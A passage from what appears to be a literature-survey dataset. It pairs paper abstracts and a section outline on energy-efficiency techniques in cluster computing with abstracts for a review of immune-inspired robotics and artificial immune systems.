Experiments on an 8-node cluster show our control daemon reduces memory energy up to 56.8% with --- paper_title: Automatic performance setting for dynamic voltage scaling paper_content: The emphasis on processors that are both low power and high performance has resulted in the incorporation of dynamic voltage scaling into processor designs. This feature allows one to make fine granularity trade-offs between power use and performance, provided there is a mechanism in the OS to control that trade-off. In this paper, we describe a novel software approach to automatically controlling dynamic voltage scaling in order to optimize energy use. Our mechanism is implemented in the Linux kernel and requires no modification of user programs. Unlike previous automated approaches, our method works equally well with irregular and multiprogrammed workloads. Moreover, it has the ability to ensure that the quality of interactive performance is within user specified parameters. Our experiments show that as a result of our algorithm, processor energy savings of as much as 75% can be achieved with only a minimal impact on the user experience. --- paper_title: Improvement of power-performance efficiency for high-end computing paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. Recent work has shown application characteristics of single-processor, memory-bound non-interactive codes and distributed, interactive Web services can be exploited to conserve power and energy with minimal performance impact. Our novel approach is to exploit parallel performance inefficiencies characteristic of non-interactive, distributed scientific applications, conserving energy using DVS (dynamic voltage scaling) without impacting time-to-solution (ITS) significantly, reducing cost and improving reliability. We present a software framework to analyze and optimize distributed power-performance using DVS implemented on a 16-node Centrino-based cluster. Using various DVS strategies we achieve application-dependent overall system energy savings as large as 25% with as little as 2% performance impact. --- paper_title: An Energy-Efficient Scheduling Algorithm Using Dynamic Voltage Scaling for Parallel Applications on Clusters paper_content: In the past decade cluster computing platforms have been widely applied to support a variety of scientific and commercial applications, many of which are parallel in nature. However, scheduling parallel applications on large scale clusters is technically challenging due to significant communication latencies and high energy consumption. As such, shortening schedule length and conserving energy consumption are two major concerns in designing economical and environmentally friendly clusters. In this paper, we propose an energy-efficient scheduling algorithm (TDVAS) using the dynamic voltage scaling technique to provide significant energy savings for clusters. The TDVAS algorithm aims at judiciously leveraging processor idle times to lower processor voltages (i.e., the dynamic voltage scaling technique or DVS), thereby reducing energy consumption experienced by parallel applications running on clusters. Reducing processor voltages, however, can inevitably lead to increased execution times of parallel task. The salient feature of the TDVAS algorithm is to tackle this problem by exploiting tasks precedence constraints. 
Thus, TDVAS applies the DVS technique to parallel tasks followed by idle processor times to conserve energy consumption without increasing schedule lengths of parallel applications. Experimental results clearly show that the TDVAS algorithm is conducive to reducing energy dissipation in large-scale clusters without adversely affecting system performance. --- paper_title: Adaptive, transparent frequency and voltage scaling of communication phases in MPI programs paper_content: Although users of high-performance computing are most interested in raw performance, both energy and power consumption have become critical concerns. Some microprocessors allow frequency and voltage scaling, which enables a system to reduce CPU performance and power when the CPU is not on the critical path. When properly directed, such dynamic frequency and voltage scaling can produce significant energy savings with little performance penalty. This paper presents an MPI runtime system that dynamically reduces CPU performance during communication phases in MPI programs. It dynamically identifies such phases and, without profiling or training, selects the CPU frequency in order to minimize energy-delay product. All analysis and subsequent frequency and voltage scaling is within MPI and so is entirely transparent to the application. This means that the large number of existing MPI programs, as well as new ones being developed, can use our system without modification. Results show that the average reduction in energy-delay product over the NAS benchmark suite is 10% - the average energy reduction is 12% while the average execution time increase is only 2.1% --- paper_title: Reducing power with performance constraints for parallel sparse applications paper_content: Sparse and irregular computations constitute a large fraction of applications in the data-intensive scientific domain. While every effort is made to balance the computational workload in such computations across parallel processors, achieving sustained near machine-peak performance with close-to-ideal load balanced computation-to-processor mapping is inherently difficult. As a result, most of the time, the loads assigned to parallel processors can exhibit significant variations. While there have been numerous past efforts that study this imbalance from the performance viewpoint, to our knowledge, no prior study has considered exploiting the imbalance for reducing power consumption during execution. Power consumption in large-scale clusters of workstations is becoming a critical issue as noted by several recent research papers from both industry and academia. Focusing on sparse matrix computations in which underlying parallel computations and data dependencies can be represented by trees, this paper proposes schemes that save power through voltage/frequency scaling. Our goal is to reduce overall energy consumption by scaling the voltages/frequencies of those processors that are not in the critical path; i.e., our approach is oriented towards saving power without incurring performance penalties. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. 
Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: Energy-Efficient Cluster Computing via Accurate Workload Characterization paper_content: This paper presents an eco-friendly daemon that reduces power and energy consumption while better maintaining high performance via an accurate workload characterization that infers “processor stall cycles due to off-chip activities.” The eco-friendly daemon is an interval-based, run-time algorithm that uses the workload characterization to dynamically adjust a processor’s frequency and voltage to reduce power and energy consumption with little impact on application performance. Using the NAS Parallel Benchmarks as our workload, we then evaluate our eco-friendly daemon on a cluster computer. The results indicate that our workload characterization allows the power-aware daemon to more tightly control performance (5% loss instead of 11%) while delivering substantial energy savings (11% instead of 8%). --- paper_title: Profile-based optimization of power performance by using dynamic voltage scaling on a PC cluster paper_content: Currently, several of the high performance processors used in a PC cluster have a DVS (dynamic voltage scaling) architecture that can dynamically scale processor voltage and frequency. Adaptive scheduling of the voltage and frequency enables us to reduce power dissipation without a performance slowdown during communication and memory access. In this paper, we propose a method of profiled-based power-performance optimization by DVS scheduling in a high-performance PC cluster. We divide the program execution into several regions and select the best gear for power efficiency. Selecting the best gear is not straightforward since the overhead of DVS transition is not free. We propose an optimization algorithm to select a gear using the execution and power profile by taking the transition overhead into account. We have built and designed a power-profiling system, PowerWatch. With this system we examined the effectiveness of our optimization algorithm on two types of power-scalable clusters (Crusoe and Turion). According to the results of benchmark tests, we achieved almost 40% reduction in terms of EDP (energy-delay product) without performance impact (less than 5%) compared to results using the standard clock frequency. --- paper_title: Exploring the energy-time tradeoff in MPI programs on a power-scalable cluster paper_content: Recently, energy has become an important issue in high-performance computing. For example, supercomputers that have energy in mind, such as BlueGene/L, have been built; the idea is to improve the energy efficiency of nodes. 
Our approach, which uses off-the-shelf, high-performance cluster nodes that are frequency scalable, allows energy saving by scaling down the CPU. This paper investigates the energy consumption and execution time of applications from a standard benchmark suite (NAS) on a power-scalable cluster. We study via direct measurement and simulation both intra-node and inter-node effects of memory and communication bottlenecks, respectively. Additionally, we compare energy consumption and execution time across different numbers of nodes. Our results show that a power-scalable cluster has the potential to save energy by scaling the processor down to lower energy levels. Furthermore, we found that for some programs, it is possible to both consume less energy and execute in less time when using a larger number of nodes, each at reduced energy. Additionally, we developed and validated a model that enables us to predict the energy-time tradeoff of larger clusters. --- paper_title: CPU MISER: A Performance-Directed, Run-Time System for Power-Aware Clusters paper_content: Performance and power are critical design constraints in today's high-end computing systems. Reducing power consumption without impacting system performance is a challenge for the HPC community. We present a runtime system (CPU MISER) and an integrated performance model for performance-directed, power-aware cluster computing. CPU MISER supports system-wide, application-independent, fine-grain, dynamic voltage and frequency scaling (DVFS) based power management for a generic power-aware cluster. Experimental results show that CPU MISER can achieve as much as 20% energy savings for the NAS parallel benchmarks. In addition to energy savings, CPU MISER is able to constrain performance loss for most applications within user-specified limits. These constraints are achieved through accurate performance modeling and prediction, coupled with advanced control techniques. --- paper_title: Using multiple energy gears in MPI programs on a power-scalable cluster paper_content: Recently, system architects have built low-power, high-performance clusters, such as Green Destiny. The idea behind these clusters is to improve the energy efficiency of nodes. However, these clusters save power at the expense of performance. Our approach is instead to use high-performance cluster nodes that are frequency- and voltage-scalable; energy can than be saved by scaling down the CPU. Our prior work has examined the costs and benefits of executing an entire application at a single reduced frequency.This paper presents a framework for executing a single application in several frequency-voltage settings. The basic idea is to first divide programs into phases and then execute a series of experiments, with each phase assigned a prescribed frequency. During each experiment, we measure energy consumption and time and then use a heuristic to choose the assignment of frequency to phase for the next experiment.Our results show that significant energy can be saved without an undue performance penalty; particularly, our heuristic finds assignments of frequency to phase that is superior to any fixed-frequency solution. Specifically, this paper shows that more than half of the NAS benchmarks exhibit a better energy-time tradeoff using multiple gears than using a single gear. For example, IS using multiple gears uses 9% less energy and executes in 1% less time than the closest single-gear solution. 
Compared to no frequency scaling, multiple gear IS uses 16% less energy while executing only 1% longer. --- paper_title: Dynamic cluster reconfiguration for power and performance paper_content: In this chapter we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on - to be able to handle the load imposed on the system efficiently - and off - to save power under lighter load. The key component of our systems is an algorithm that makes cluster reconfiguration decisions by considering the total load imposed on the system and the power and performance implications of changing the current configuration. The algorithm is implemented in two common cluster-based systems: a network server and an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: Load Balancing and Unbalancing for Power and Performance in Cluster-Based Systems paper_content: In this paper we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on – to be able to handle the load imposed on the system efficiently – and off – to save power under lighter load. The key component of our systems is an algorithm that makes load balancing and unbalancing decisions by considering both the total load imposed on the cluster and the power and performance implications of turning nodes off. The algorithm is implemented in two different ways: (1) at the application level for a cluster-based, localityconscious network server; and (2) at the operating system level for an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: Adaptive, transparent frequency and voltage scaling of communication phases in MPI programs paper_content: Although users of high-performance computing are most interested in raw performance, both energy and power consumption have become critical concerns. Some microprocessors allow frequency and voltage scaling, which enables a system to reduce CPU performance and power when the CPU is not on the critical path. When properly directed, such dynamic frequency and voltage scaling can produce significant energy savings with little performance penalty. This paper presents an MPI runtime system that dynamically reduces CPU performance during communication phases in MPI programs. It dynamically identifies such phases and, without profiling or training, selects the CPU frequency in order to minimize energy-delay product. All analysis and subsequent frequency and voltage scaling is within MPI and so is entirely transparent to the application. This means that the large number of existing MPI programs, as well as new ones being developed, can use our system without modification. Results show that the average reduction in energy-delay product over the NAS benchmark suite is 10% - the average energy reduction is 12% while the average execution time increase is only 2.1% --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. 
High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. ---
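Several of the works above (the performance-directed DVS schedulers and the multiple-gear study) compare candidate schedules by their energy-delay product. A small illustrative Python helper for that comparison is shown below; the measurement numbers are invented for the example and do not come from the cited experiments:

```python
def energy_delay_product(energy_j, time_s, weight=1):
    """EDP (weight=1) or ED^2P (weight=2); lower is better."""
    return energy_j * time_s ** weight

def best_schedule(measurements, weight=1):
    """measurements maps a schedule label (e.g. a per-phase gear assignment)
    to its measured (energy in joules, execution time in seconds)."""
    return min(measurements,
               key=lambda name: energy_delay_product(*measurements[name], weight))

# Invented measurements for one application under three candidate schedules:
runs = {
    "always 2.0 GHz":         (14.4e3, 100.0),
    "always 1.6 GHz":         (11.5e3, 108.0),
    "per-phase (multi-gear)":  (11.0e3, 101.0),
}
print(best_schedule(runs))   # -> "per-phase (multi-gear)"
```

Raising the delay exponent (ED²P) penalizes slowdowns more heavily, which is one way the surveyed systems bias the choice toward performance when users require it.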
Title: An Overview of Energy Efficiency Techniques in Cluster Computing Systems
Section 1: Introduction and motivation
Description 1: This section provides the background, historical context, and the importance of energy efficiency in cluster computing systems.
Section 2: Static power management
Description 2: This section discusses various static power management (SPM) techniques, including the use of low-power components and examples of successful implementations.
Section 3: Dynamic power management
Description 3: This section explores dynamic power management (DPM) techniques, focusing on real-time adaptation based on resource utilization and workload.
Section 4: Software and power-scalable components
Description 4: This section elaborates on the role of software and power-scalable components in DPM, including dynamic voltage and frequency scaling (DVFS) modules and their related scheduling strategies.
Section 5: Power-scalable memory
Description 5: This section covers dynamic power-scalable memory management systems and their effectiveness in reducing energy consumption in cluster computing.
Section 6: Power-scalable processors
Description 6: This section examines power-scalable processors, such as those using DVFS, and their impact on energy savings and performance.
Section 7: Load balancing
Description 7: This section discusses load balancing techniques aimed at distributing workload to achieve optimal resource utilization and energy efficiency.
Section 8: Discussion
Description 8: This section summarizes the findings, highlights the challenges of achieving energy efficiency in cluster computing, and suggests future directions in terms of power management techniques.
Section 9: Conclusion
Description 9: This section concludes the paper by summarizing the key points discussed and their implications for energy efficiency in cluster computing systems.
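The load-balancing material in Section 7 of this outline, and the cluster reconfiguration papers cited above (dynamic cluster reconfiguration, load balancing and unbalancing), concentrate work on as few nodes as current demand allows and power the rest down. A toy Python sketch of that decision follows; the capacities, headroom, and hysteresis rule are illustrative assumptions, not the published algorithms:

```python
import math

def nodes_to_keep_on(total_load, node_capacity, active_now, headroom=0.2):
    """How many nodes to leave powered on: enough capacity for the current
    load plus a headroom margin, with simple hysteresis so a brief dip in
    load does not switch several nodes off at once."""
    target = max(1, math.ceil(total_load * (1.0 + headroom) / node_capacity))
    if target < active_now - 1:
        target = active_now - 1        # shrink by at most one node per decision
    return target

# 430 requests/s of offered load, 100 requests/s per node, 8 nodes currently on:
print(nodes_to_keep_on(430.0, 100.0, 8))   # -> 7
```

The headroom and the one-node-at-a-time shrink rule trade a little extra power for protection against oscillation and against load spikes arriving while a node is still booting.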
Immuno-inspired robotic applications: a review
9
--- paper_title: Application areas of AIS: The past, the present and the future paper_content: After a decade of research into the area of artificial immune systems, it is worthwhile to take a step back and reflect on the contributions that the paradigm has brought to the application areas to which it has been applied. Undeniably, there have been a lot of successful stories; however, if the field is to advance in the future and really carve out its own distinctive niche, then it is necessary to be able to illustrate that there are clear benefits to be obtained by applying this paradigm rather than others. This paper attempts to take stock of the application areas that have been tackled in the past, and ask the difficult question "was it worth it?". We then attempt to suggest a set of problem features that we believe will allow the true potential of the immunological system to be exploited in computational systems, and define a unique niche for AIS. --- paper_title: Applying inter-layer conflict resolution to hybrid robot control architectures paper_content: In this document, we propose and examine the novel use of a learning mechanism between the reactive and deliberative layers of a hybrid robot control architecture. Balancing the need to achieve complex goals and meet real-time constraints, many modern mobile robot navigation control systems make use of a hybrid deliberative-reactive architecture. In this paradigm, a high-level deliberative layer plans routes or actions toward a known goal, based on accumulated world knowledge. A low-level reactive layer selects motor commands based on current sensor data and the deliberative layer's plan. The desired system-level effect of this architecture is that the robot is able to combine complex reasoning toward global objectives with quick reaction to local constraints. Implicit in this type of architecture is the assumption that both layers are using the same model of the robot's capabilities and constraints. It may happen, for example, due to differences in representation of the robot's kinematic constraints, that the deliberative layer creates a plan that the reactive layer cannot follow. This sort of conflict may cause a degradation in system-level performance, if not complete navigational deadlock. Traditionally, it has been the task of the robot designer to ensure that the layers operate in a compatible manner. However, this is a complex, empirical task. Working to improve system-level performance and navigational robustness, we propose introducing a learning mechanism between the reactive layer and the deliberative layer, allowing the deliberative layer to learn a model of the reactive layer's execution of its plans. First, we focus on detecting this inter-layer conflict, and acting based on a corrected model. This is demonstrated on a physical robotic platform in an unstructured outdoor environment. Next, we focus on learning a model to predict instances of inter-layer conflict, and planning to act with respect to this model. This is demonstrated using supervised learning in a physics-based simulation environment. Results and algorithms are presented. --- paper_title: Assessing cooperation in human control of heterogeneous robots paper_content: Human control of multiple robots has been characterized by the average demand of single robots on human attention.
While this matches situations in which independent robots are controlled sequentially it does not capture aspects of demand associated with coordinating dependent actions among robots. This paper presents an extension of Crandall's neglect tolerance model intended to accommodate both coordination demands (CD) and heterogeneity among robots. The reported experiment attempts to manipulate coordination demand by varying the proximity needed to perform a joint task in two conditions and by automating coordination within subteams in a third. Team performance and the process measure CD were assessed for each condition. Automating cooperation reduced CD and improved performance. We discuss the utility of process measures such as CD to analyze and improve control performance. --- paper_title: Immunological Computation: Theory and Applications paper_content: Over the last decade, the field of immunological computation has progressed slowly and steadily as a branch of computational intelligence. Immunological Computation: Theory and Applications presents up-to-date immunity-based computational techniques. After a brief review of fundamental immunology concepts, the book presents computational models based on the negative selection process that occurs in the thymus. It then examines immune networks, including continuous and discrete immune network models, clonal selection, hybrid models, and computational models based on danger theory. The book also discusses real-world applications for all of the models covered in each chapter. --- paper_title: Evolving Mobile Robots Able to Display Collective Behaviors paper_content: We present a set of experiments in which simulated robots are evolved for the ability to aggregate and move together toward a light target. By developing and using quantitative indexes that capture the structural properties of the emerged formations, we show that evolved individuals display interesting behavioral patterns in which groups of robots act as a single unit. Moreover, evolved groups of robots with identical controllers display primitive forms of situated specialization and play different behavioral functions within the group according to the circumstances. Overall, the results presented in the article demonstrate that evolutionary techniques, by exploiting the self-organizing behavioral properties that emerge from the interactions between the robots and between the robots and the environment, are a powerful method for synthesizing collective behavior. --- paper_title: Evolving Homogeneous Neurocontrollers for a Group of Heterogeneous Robots: Coordinated Motion, Cooperation, and Acoustic Communication paper_content: This article describes a simulation model in which artificial evolution is used to design homogeneous control structures and adaptive communication protocols for a group of three autonomous simulated robots. The agents are required to cooperate in order to approach a light source while avoiding collisions. The robots are morphologically different: Two of them are equipped with infrared sensors, one with light sensors. Thus, the two morphologically identical robots should take care of obstacle avoidance; the other one should take care of phototaxis. Since all of the agents can emit and perceive sound, the group's coordination of actions is based on acoustic communication. 
The results of this study are a proof of concept: They show that dynamic artificial neural networks can be successfully synthesized by artificial evolution to design the neural mechanisms required to underpin the behavioral strategies and adaptive communication capabilities demanded by this task. Postevaluation analyses unveil operational aspects of the best evolved behavior. Our results suggest that the building blocks and the evolutionary machinery detailed in the article should be considered in future research work dealing with the design of homogeneous controllers for groups of heterogeneous cooperating and communicating robots. --- paper_title: Decentralized Cooperative Policy for Conflict Resolution in Multivehicle Systems paper_content: In this paper, we propose a novel policy for steering multiple vehicles between assigned start and goal configurations, ensuring collision avoidance. The policy rests on the assumption that all agents are cooperating by implementing the same traffic rules. However, the policy is completely decentralized, as each agent decides its own motion by applying those rules only to the locally available information, and scalable, in the sense that the amount of information processed by each agent and the computational complexity of the algorithms do not increase with the number of agents in the scenario. The proposed policy applies to systems in which new vehicles may enter the scene and start interacting with existing ones at any time, while others may leave. Under mild conditions on the initial configurations, the policy is shown to be safe, i.e., it guarantees collision avoidance throughout the system evolution. In the paper, conditions are discussed on the desired configurations of agents, under which the ultimate convergence of all vehicles to their goals can also be guaranteed. To show that such conditions are actually necessary and sufficient, which turns out to be a challenging liveness-verification problem for a complex hybrid automaton, we employ a probabilistic verification method. The paper finally presents and discusses simulations for systems of several tens of vehicles, and reports on some experimental implementation showing the practicality of the approach. --- paper_title: An overview of planning technology in robotics paper_content: We present here an overview of several planning techniques in robotics. We will not be concerned with the synthesis of abstract mission and task plans, using well known classical and other domain-independent planning techniques. We will mainly focus on how to refine such abstract plans into robust sensory-motor actions and on some planning techniques that can be useful for that. --- paper_title: A theory of self-nonself discrimination. paper_content: 1) Induction of humoral antibody formation involves the obligatory recognition of two determinants on an antigen, one by the receptor antibody of the antigen-sensitive cell and the other by carrier antibody (associative interaction). 2) Paralysis of antibody formation involves the obligatory recognition of only one determinant by the receptor antibody of the antigen-sensitive cell; that is, a nonimmunogenic molecule (a hapten) can paralyze antigen-sensitive cells. 3) There is competition between paralysis and induction at the level of the antigen-sensitive cell. 4) The mechanisms of low- and high-zone paralysis, and maintenance of the unresponsive state, are identical.
5) High-zone paralysis occurs when both the carrier antibody and the receptor antibody are saturated, so that associated interactions cannot take place. 6) The mechanisms of paralysis and induction for the carrier-antigen-sensitive cell are identical to those for the humoral-antigen-sensitive cell. 7) The formation of carrier-antigen-sensitive cells is thymus-dependent, whereas humoral-antigen-sensitive cells are derived from bone marrow. Since carrier antibody is required for induction, all antigens are thymus-dependent. 8) The interaction of antigen with the receptor antibody on an antigen-sensitive cell results in a conformational change in an invariant region of the receptor and consequently paralyzes the cell. As the receptor is probably identical to the induced antibody, all antibody molecules are expected to be able to undergo a conformational change on binding a hapten. The obligatory associated recognition by way of carrier antibody (inductive signal) involves a conformational change in the carrier antibody, leading to a second signal to the antigen-sensitive cell. 9) The foregoing requirements provide an explanation for self-nonself discrimination. Tolerance to self-antigens involves a specific deletion in the activity of both the humoral- and the carrier-antigen-sensitive cells. --- paper_title: The danger model: A renewed sense of self paper_content: For over 50 years immunologists have based their thoughts, experiments, and clinical treatments on the idea that the immune system functions by making a distinction between self and nonself. Although this paradigm has often served us well, years of detailed examination have revealed a number of inherent problems. This Viewpoint outlines a model of immunity based on the idea that the immune system is more concerned with entities that do damage than with those that are foreign. --- paper_title: A Paratope is Not an Epitope: Implications for Immune Network Models and Clonal Selection paper_content: Artificial Immune Systems (AIS) research into clonal selection and immune network models has tended to use a single, real-valued or binary vector to represent both the paratope and epitope of a B-cell; in this paper, the use of alternative representations is discussed. A theoretical generic immune network (GIN) is presented, that can be used to explore the network dynamics of several families of different B-cell representations at the same time, and that combines features of clonal selection and immune networks in a single model. --- paper_title: Improved Pattern Recognition with Artificial Clonal Selection? paper_content: In this paper, we examine the clonal selection algorithm CLONALG and the suggestion that it is suitable for pattern recognition. CLONALG is tested over a series of binary character recognition tasks and its performance compared to a set of basic binary matching algorithms.
A number of enhancements are made to the algorithm to improve its performance and the classification tests are repeated. Results show that given enough data CLONALG can successfully classify previously unseen patterns and that adjustments to the existing algorithm can improve performance. --- paper_title: Immunological Computation: Theory and Applications paper_content: Over the last decade, the field of immunological computation has progressed slowly and steadily as a branch of computational intelligence. Immunological Computation: Theory and Applications presents up-to-date immunity-based computational techniques. After a brief review of fundamental immunology concepts, the book presents computational models based on the negative selection process that occurs in the thymus. It then examines immune networks, including continuous and discrete immune network models, clonal selection, hybrid models, and computational models based on danger theory. The book also discusses real-world applications for all of the models covered in each chapter. --- paper_title: The immune system, adaptation, and machine learning paper_content: Abstract The immune system is capable of learning, memory, and pattern recognition. By employing genetic operators on a time scale fast enough to observe experimentally, the immune system is able to recognize novel shapes without preprogramming. Here we describe a dynamical model for the immune system that is based on the network hypothesis of Jerne, and is simple enough to simulate on a computer. This model has a strong similarity to an approach to learning and artificial intelligence introduced by Holland, called the classifier system. We demonstrate that simple versions of the classifier system can be cast as a nonlinear dynamical system, and explore the analogy between the immune and classifier systems in detail. Through this comparison we hope to gain insight into the way they perform specific tasks, and to suggest new approaches that might be of value in learning systems. --- paper_title: Stability of symmetric idiotypic networks—A critique of Hoffmann's analysis paper_content: Hoffmann (1982) analysed a very simple model of suppressive idiotypic immune networks and showed that idiotypic interactions are stabilizing. He concluded that immune networks provide a counterexample to the general analysis of large dynamic systems (Gardner and Ashby, 1970; May, 1972). The latter is often verbalized as: an increase in size and/or connectivity decreases the system stability. We here analyse this apparent contradiction by extending the Hoffmann model (with a decay term), and comparing it to an ecological model that was used as a paradigm in the general analysis. Our analysis confirms that the neighbourhood stability of such idiotypic networks increases with connectivity and/or size. However, the contradiction is one of interpretation, and is not due to exceptional properties of immune networks. The contradiction is caused by the awkward normalization used in the general analysis. --- paper_title: The 'complete' idiotype network is an absurd immune system. paper_content: Idiotypic networks have attained the status of unavoidable necessities in the regulation of immune responses. In this article Rod Langman and Mel Cohn contend that the conceptual foundations for such idiotypic networks are formal absurdities. 
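The CLONALG work summarised above follows the standard clonal selection loop: rank the repertoire by affinity, clone the best antibodies in proportion to their rank, hypermutate the clones at a rate that falls as affinity rises, and re-select while injecting a few fresh random cells. The fragment below is a minimal sketch of that loop for a real-valued search problem; the affinity function, population sizes, mutation schedule and bounds are illustrative assumptions, not the settings used in the cited papers.

import random

def clonalg(affinity, dim, pop_size=20, n_select=5, clone_factor=3,
            generations=100, bounds=(-1.0, 1.0)):
    """Minimal CLONALG-style loop: select, clone, hypermutate, re-select.
    affinity: callable scoring a candidate vector (higher is better)."""
    lo, hi = bounds
    rand_ab = lambda: [random.uniform(lo, hi) for _ in range(dim)]
    pop = [rand_ab() for _ in range(pop_size)]

    def hypermutate(ab, rate):
        # Mutation strength grows with rate; each gene is clamped to the bounds.
        return [min(hi, max(lo, g + rate * random.gauss(0.0, 0.1 * (hi - lo))))
                for g in ab]

    for _ in range(generations):
        ranked = sorted(pop, key=affinity, reverse=True)
        selected = ranked[:n_select]
        clones = []
        for rank, ab in enumerate(selected):
            n_clones = clone_factor * (n_select - rank)   # better rank -> more clones
            rate = (rank + 1) / n_select                  # better rank -> smaller mutation
            clones += [hypermutate(ab, rate) for _ in range(n_clones)]
        survivors = sorted(selected + clones, key=affinity, reverse=True)[:pop_size - 2]
        pop = survivors + [rand_ab(), rand_ab()]          # metadynamics: inject fresh cells
    return max(pop, key=affinity)

# Example call with a toy 2-D affinity (illustrative only).
best = clonalg(lambda v: -(v[0] ** 2 + v[1] ** 2), dim=2)

The random replacement of the two worst members each generation is the metadynamics step that several of the cited papers rely on to avoid premature convergence.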
--- paper_title: Integrated Innate and Adaptive Artificial Immune Systems Applied to Process Anomaly Detection paper_content: This thesis explores the design and application of artificial immune systems (AISs), problem-solving systems inspired by the human and other immune systems. AISs to date have largely been modelled on the biological adaptive immune system and have taken little inspiration from the innate immune system. The first part of this thesis examines the biological innate immune system, which controls the adaptive immune system. The importance of the innate immune system suggests that AISs should also incorporate models of the innate immune system as well as the adaptive immune system. This thesis presents and discusses a number of design principles for AISs which are modelled on both innate and adaptive immunity. These novel design principles provided a structured framework for developing AISs which incorporate innate and adaptive immune systems in general. These design principles are used to build a software system which allows such AISs to be implemented and explored. AISs, as well as being inspired by the biological immune system, are also built to solve problems. In this thesis, using the software system and design principles we have developed, we implement several novel AISs and apply them to the problem of detecting attacks on computer systems. These AISs monitor programs running on a computer and detect whether the program is behaving abnormally or being attacked. The development of these AISs shows in more detail how AISs built on the design principles can be instantiated. In particular, we show how the use of AISs which incorporate both innate and adaptive immune system mechanisms can be used to reduce the number of false alerts and improve the performance of current approaches. --- paper_title: Articulation and Clarification of the Dendritic Cell Algorithm paper_content: The Dendritic Cell algorithm (DCA) is inspired by recent work in innate immunity. In this paper a formal description of the DCA is given. The DCA is described in detail, and its use as an anomaly detector is illustrated within the context of computer security. A port scan detection task is performed to substantiate the influence of signal selection on the behaviour of the algorithm. Experimental results provide a comparison of differing input signal mappings. --- paper_title: Danger Theory: The Link between AIS and IDS? paper_content: We present ideas about creating a next generation Intrusion Detection System based on the latest immunological theories. The central challenge with computer security is determining the difference between normal and potentially harmful activity. For half a century, developers have protected their systems by coding rules that identify and block specific events. However, the nature of current and future threats in conjunction with ever larger IT systems urgently requires the development of automated and adaptive defensive tools. A promising solution is emerging in the form of Artificial Immune Systems. The Human Immune System can detect and defend against harmful and previously unseen invaders, so can we not build a similar Intrusion Detection System for our computers. --- paper_title: An immunological approach to mobile robot reactive navigation paper_content: In this paper, a reactive immune network (RIN) is proposed and employed for mobile robot navigation within unknown environments. 
Rather than building a detailed mathematical model of artificial immune systems, this study tries to explore the principle in an immune network focusing on its self-organization, adaptive learning capability, and immune feedback. In addition, an adaptive virtual target method is integrated to solve the local minima problem in navigation. Several trapping situations designed by the early researchers are adopted to evaluate the performance of the proposed architecture. Simulation results show that the mobile robot is capable of avoiding obstacles, escaping traps, and reaching the goal efficiently and effectively. --- paper_title: Immunity-based autonomous guided vehicles control paper_content: The human immune system is a self-organizing and highly distributed multi-agent system. These properties impart a high degree of robustness and performance that has created great interest in implementing engineering systems. This adopted engineering analogue is called Artificial Immune System (AIS). This paper presents an immunity-based control framework which has the ability to detect changes, adapt to dynamic environment and coordinate vehicles activities for goals achievement, to deploy a fleet of AGVs for material handling in an automated warehouse. A robust and flexible automated warehousing system is achieved through the non-deterministic and fully decentralized origination of AGVs. --- paper_title: Modeling a MultiAgent Mobile Robotics Test Bed Using a Biologically Inspired Artificial Immune System paper_content: The biological immune system is a complex, adaptive, pattern-recognition system that defends the body from foreign pathogens. The system uses learning, memory, and associative retrieval to solve recognition issues and classification of tasks. In particular, it learns to recognize relevant problems, remember those encountered in the past, and uses combinations to construct problem detectors efficiently. This paper explores an application of an adaptive learning mechanism for robots based on the natural immune system, using two algorithms, viz., the behavior arbitration mechanism and the clonal selection algorithm to demonstrate the innate and adaptive immune response respectively. The work highlights the innate and adaptive characteristics of the immune system, wherein a robot learns to detect vulnerable areas of a track and adapts to the required speed over such portions. A detailed study of the artificial immune metaphor is carried out and mapped onto the robot world. The robotics test bed comprised of two Lego robots deployed simultaneously on two predefined near concentric tracks with the outer robot capable of helping the inner one when it misaligns. The inner robot raises an SOS signal on misalignment. The outer robot aids the inner robot to regain it alignment exhibiting the innate immunity. The adaptive system within the inner robot learns to tackle the problem in future using Clonal Selection mechanism. --- paper_title: Clonal selection based mobile robot path planning paper_content: Clonal selection based mobile robot global path planning method is presented in the article, which is composed of encoding of antibody, fitness function construct, selection strategy and immune operator definition. Path distance and degree of intersecting with obstacle are both considered in the definition of fitness function. Mutation operator, insert operator and delete operator are designed according to the problem of mobile robot path planning. 
